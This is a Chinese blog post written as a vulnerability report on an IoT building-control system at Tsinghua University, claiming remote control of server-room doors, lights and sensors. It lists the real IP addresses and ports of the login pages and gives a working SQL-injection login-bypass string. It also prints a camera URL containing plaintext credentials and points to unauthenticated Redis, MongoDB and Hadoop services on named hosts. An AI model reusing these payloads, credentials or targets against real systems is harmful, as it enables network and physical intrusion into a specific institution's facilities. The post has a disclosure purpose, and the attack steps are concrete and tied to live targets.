酷帥王子'blog-

物联网风险之看我如何远程打开清华大学的机房大门

2022-3-31 4:05 作者:酷帥王子 | 工控物联网车联网安全 |

详细说明:

http://166.111.9.20:802/View/Login.aspx
http://166.111.9.20:803/View/Login.aspx
http://166.111.9.22:802/View/Login.aspx
http://166.111.9.22:803/View/Login.aspx
http://166.111.9.22:8088/View/Login.aspx
全是这个系统。

QQ.png


漏洞证明:

用户名存在注入。

QQ.png


去.png


直接使用admin'OR'a'='a/admin'OR'a'='a
这时候点登录没有反应。
然后在进入web根目录,就直接登录了。
你们两台机器的mysql密码都被我破解了。
费了我1毛钱。

111.png


11.jpg


同时两台都开着redis,而且都可以未授权访问。

钱.png


123.jpg


111.jpg


222.jpg


333.jpg


444.jpg


555.jpg


qew.jpg


远程开门:

12321312.jpg


32131.jpg


读取温湿度:

111.jpg


远程开灯:

222.jpg


还有读取摄像头的IF内嵌页面地址为:
http://166.111.9.22:8088/View/RealTimeMonitoringManage/VideocamMonitoringManage.aspx?ip=172.18.3.82&Sport=80&Sname=admin&Spwd=rzxhadmin168&SChannel=0
你们不觉得泄漏了点什么么?

111.jpg


而且这种URL审查源码后还是有泄漏,这个input表单是怎么回事?
C段有个Mongodb未授权访问。
http://166.111.9.231:8088/cluster/nodes
http://166.111.9.231:8088/logs/
hadoop未授权访问。

1111.jpg


文章作者:酷帥王子
文章地址:https://2k8.org:443/post-345.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!

发表评论:



Powered by 酷帥王子

CopyRight © 2009-2016 酷帥王子'blog.  All rights reserved.